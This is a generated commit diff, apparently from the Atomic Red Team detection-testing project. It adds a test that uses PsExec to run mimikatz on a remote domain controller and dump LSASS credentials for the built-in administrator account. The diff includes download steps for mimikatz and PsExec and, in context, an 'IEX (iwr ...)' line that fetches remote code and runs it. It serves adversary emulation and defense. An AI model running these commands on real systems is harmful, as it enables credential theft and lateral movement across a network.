Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]

2021-01-06 18:42:39 +00:00
parent 90611a079a
commit 603040c6e3
6 changed files with 185 additions and 0 deletions
@@ -53,6 +53,7 @@ privilege-escalation,T1055.012,Process Hollowing,1,Process Hollowing using Power
 privilege-escalation,T1055.012,Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
 privilege-escalation,T1055,Process Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
 privilege-escalation,T1055,Process Injection,2,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell
+privilege-escalation,T1055,Process Injection,3,Remote Process Injection in LSASS via mimikatz,3203ad24-168e-4bec-be36-f79b13ef8a83,command_prompt
 privilege-escalation,T1037.004,Rc.common,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash
 privilege-escalation,T1547.007,Re-opened Applications,1,Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,manual
 privilege-escalation,T1547.007,Re-opened Applications,2,Re-Opened Applications,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh
@@ -454,6 +455,7 @@ defense-evasion,T1055.012,Process Hollowing,1,Process Hollowing using PowerShell
 defense-evasion,T1055.012,Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
 defense-evasion,T1055,Process Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
 defense-evasion,T1055,Process Injection,2,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell
+defense-evasion,T1055,Process Injection,3,Remote Process Injection in LSASS via mimikatz,3203ad24-168e-4bec-be36-f79b13ef8a83,command_prompt
 defense-evasion,T1216.001,PubPrn,1,PubPrn.vbs Signed Script Bypass,9dd29a1f-1e16-4862-be83-913b10a88f6c,command_prompt
 defense-evasion,T1218.009,Regsvcs/Regasm,1,Regasm Uninstall Method Call Test,71bfbfac-60b1-4fc0-ac8b-2cedbbdcb112,command_prompt
 defense-evasion,T1218.009,Regsvcs/Regasm,2,Regsvcs Uninstall Method Call Test,fd3c1c6a-02d2-4b72-82d9-71c527abb126,powershell
@@ -101,6 +101,7 @@ privilege-escalation,T1055.012,Process Hollowing,1,Process Hollowing using Power
 privilege-escalation,T1055.012,Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
 privilege-escalation,T1055,Process Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
 privilege-escalation,T1055,Process Injection,2,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell
+privilege-escalation,T1055,Process Injection,3,Remote Process Injection in LSASS via mimikatz,3203ad24-168e-4bec-be36-f79b13ef8a83,command_prompt
 privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,1,Reg Key Run,e55be3fd-3521-4610-9d1a-e210e42dcf05,command_prompt
 privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,2,Reg Key RunOnce,554cbd88-cde1-4b56-8168-0be552eed9eb,command_prompt
 privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,3,PowerShell Registry RunOnce,eb44f842-0457-4ddc-9b92-c4caa144ac42,powershell
@@ -260,6 +261,7 @@ defense-evasion,T1055.012,Process Hollowing,1,Process Hollowing using PowerShell
 defense-evasion,T1055.012,Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
 defense-evasion,T1055,Process Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
 defense-evasion,T1055,Process Injection,2,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell
+defense-evasion,T1055,Process Injection,3,Remote Process Injection in LSASS via mimikatz,3203ad24-168e-4bec-be36-f79b13ef8a83,command_prompt
 defense-evasion,T1216.001,PubPrn,1,PubPrn.vbs Signed Script Bypass,9dd29a1f-1e16-4862-be83-913b10a88f6c,command_prompt
 defense-evasion,T1218.009,Regsvcs/Regasm,1,Regasm Uninstall Method Call Test,71bfbfac-60b1-4fc0-ac8b-2cedbbdcb112,command_prompt
 defense-evasion,T1218.009,Regsvcs/Regasm,2,Regsvcs Uninstall Method Call Test,fd3c1c6a-02d2-4b72-82d9-71c527abb126,powershell
@@ -117,6 +117,7 @@
 - [T1055 Process Injection](../../T1055/T1055.md)
  - Atomic Test #1: Process Injection via mavinject.exe [windows]
  - Atomic Test #2: Shellcode execution via VBA [windows]
+  - Atomic Test #3: Remote Process Injection in LSASS via mimikatz [windows]
 - T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1037.004 Rc.common](../../T1037.004/T1037.004.md)
  - Atomic Test #1: rc.common [macos]
@@ -839,6 +840,7 @@
 - [T1055 Process Injection](../../T1055/T1055.md)
  - Atomic Test #1: Process Injection via mavinject.exe [windows]
  - Atomic Test #2: Shellcode execution via VBA [windows]
+  - Atomic Test #3: Remote Process Injection in LSASS via mimikatz [windows]
 - T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1216.001 PubPrn](../../T1216.001/T1216.001.md)
  - Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows]
@@ -223,6 +223,7 @@
 - [T1055 Process Injection](../../T1055/T1055.md)
  - Atomic Test #1: Process Injection via mavinject.exe [windows]
  - Atomic Test #2: Shellcode execution via VBA [windows]
+  - Atomic Test #3: Remote Process Injection in LSASS via mimikatz [windows]
 - [T1547.001 Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md)
  - Atomic Test #1: Reg Key Run [windows]
  - Atomic Test #2: Reg Key RunOnce [windows]
@@ -478,6 +479,7 @@
 - [T1055 Process Injection](../../T1055/T1055.md)
  - Atomic Test #1: Process Injection via mavinject.exe [windows]
  - Atomic Test #2: Shellcode execution via VBA [windows]
+  - Atomic Test #3: Remote Process Injection in LSASS via mimikatz [windows]
 - [T1216.001 PubPrn](../../T1216.001/T1216.001.md)
  - Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows]
 - T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -5967,6 +5967,62 @@ privilege-escalation:
          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
          Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt" -officeProduct "Word" -sub "Execute"
        name: powershell
+    - name: Remote Process Injection in LSASS via mimikatz
+      auto_generated_guid: 3203ad24-168e-4bec-be36-f79b13ef8a83
+      description: |
+        Use mimikatz to remotely (via psexec) dump LSASS process content for RID 500 via code injection (new thread).
+        It must be executed in the context of a user who is privileged on remote `machine`.
+
+        The effect of `/inject` is explained in <https://blog.3or.de/mimikatz-deep-dive-on-lsadumplsa-patch-and-inject.html>
+      supported_platforms:
+      - windows
+      input_arguments:
+        machine:
+          description: machine to target (via psexec)
+          type: string
+          default: DC1
+        mimikatz_path:
+          description: Mimikatz windows executable
+          type: path
+          default: "%tmp%\\mimikatz\\x64\\mimikatz.exe"
+        psexec_path:
+          description: Path to PsExec
+          type: string
+          default: C:\PSTools\PsExec.exe
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Mimikatz executor must exist on disk and at specified location
+          (#{mimikatz_path})
+
+'
+        prereq_command: |
+          $mimikatz_path = cmd /c echo #{mimikatz_path}
+          if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
+        get_prereq_command: |
+          $mimikatz_path = cmd /c echo #{mimikatz_path}
+          Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
+          Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
+          New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
+          Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
+      - description: 'PsExec tool from Sysinternals must exist on disk at specified
+          location (#{psexec_path})
+
+'
+        prereq_command: 'if (Test-Path "#{psexec_path}") { exit 0} else { exit 1}
+
+'
+        get_prereq_command: |
+          Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
+          Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force
+          New-Item -ItemType Directory (Split-Path "#{psexec_path}") -Force | Out-Null
+          Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_path}" -Force
+      executor:
+        command: '#{psexec_path} /accepteula \\#{machine} -s -c #{mimikatz_path} "lsadump::lsa
+          /inject /id:500" "exit"
+
+'
+        name: command_prompt
+        elevation_required: false
  T1055.008:
    technique:
      external_references:
@@ -36768,6 +36824,62 @@ defense-evasion:
          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
          Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt" -officeProduct "Word" -sub "Execute"
        name: powershell
+    - name: Remote Process Injection in LSASS via mimikatz
+      auto_generated_guid: 3203ad24-168e-4bec-be36-f79b13ef8a83
+      description: |
+        Use mimikatz to remotely (via psexec) dump LSASS process content for RID 500 via code injection (new thread).
+        It must be executed in the context of a user who is privileged on remote `machine`.
+
+        The effect of `/inject` is explained in <https://blog.3or.de/mimikatz-deep-dive-on-lsadumplsa-patch-and-inject.html>
+      supported_platforms:
+      - windows
+      input_arguments:
+        machine:
+          description: machine to target (via psexec)
+          type: string
+          default: DC1
+        mimikatz_path:
+          description: Mimikatz windows executable
+          type: path
+          default: "%tmp%\\mimikatz\\x64\\mimikatz.exe"
+        psexec_path:
+          description: Path to PsExec
+          type: string
+          default: C:\PSTools\PsExec.exe
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Mimikatz executor must exist on disk and at specified location
+          (#{mimikatz_path})
+
+'
+        prereq_command: |
+          $mimikatz_path = cmd /c echo #{mimikatz_path}
+          if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
+        get_prereq_command: |
+          $mimikatz_path = cmd /c echo #{mimikatz_path}
+          Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
+          Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
+          New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
+          Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
+      - description: 'PsExec tool from Sysinternals must exist on disk at specified
+          location (#{psexec_path})
+
+'
+        prereq_command: 'if (Test-Path "#{psexec_path}") { exit 0} else { exit 1}
+
+'
+        get_prereq_command: |
+          Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
+          Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force
+          New-Item -ItemType Directory (Split-Path "#{psexec_path}") -Force | Out-Null
+          Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_path}" -Force
+      executor:
+        command: '#{psexec_path} /accepteula \\#{machine} -s -c #{mimikatz_path} "lsadump::lsa
+          /inject /id:500" "exit"
+
+'
+        name: command_prompt
+        elevation_required: false
  T1055.008:
    technique:
      external_references:
@@ -12,6 +12,8 @@ More sophisticated samples may perform multiple process injections to segment mo

 - [Atomic Test #2 - Shellcode execution via VBA](#atomic-test-2---shellcode-execution-via-vba)

+- [Atomic Test #3 - Remote Process Injection in LSASS via mimikatz](#atomic-test-3---remote-process-injection-in-lsass-via-mimikatz)
+

 <br/>

@@ -105,4 +107,67 @@ Write-Host "You will need to install Microsoft Word (64-bit) manually to meet th



+<br/>
+<br/>
+
+## Atomic Test #3 - Remote Process Injection in LSASS via mimikatz
+Use mimikatz to remotely (via psexec) dump LSASS process content for RID 500 via code injection (new thread).
+It must be executed in the context of a user who is privileged on remote `machine`.
+
+The effect of `/inject` is explained in <https://blog.3or.de/mimikatz-deep-dive-on-lsadumplsa-patch-and-inject.html>
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| machine | machine to target (via psexec) | string | DC1|
+| mimikatz_path | Mimikatz windows executable | path | %tmp%&#92;mimikatz&#92;x64&#92;mimikatz.exe|
+| psexec_path | Path to PsExec | string | C:&#92;PSTools&#92;PsExec.exe|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+#{psexec_path} /accepteula \\#{machine} -s -c #{mimikatz_path} "lsadump::lsa /inject /id:500" "exit"
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Mimikatz executor must exist on disk and at specified location (#{mimikatz_path})
+##### Check Prereq Commands:
+```powershell
+$mimikatz_path = cmd /c echo #{mimikatz_path}
+if (Test-Path $mimikatz_path) {exit 0} else {exit 1} 
+```
+##### Get Prereq Commands:
+```powershell
+$mimikatz_path = cmd /c echo #{mimikatz_path}
+Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
+Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
+New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
+Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
+```
+##### Description: PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_path})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path "#{psexec_path}") { exit 0} else { exit 1} 
+```
+##### Get Prereq Commands:
+```powershell
+Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
+Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force
+New-Item -ItemType Directory (Split-Path "#{psexec_path}") -Force | Out-Null
+Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_path}" -Force
+```
+
+
+
+
 <br/>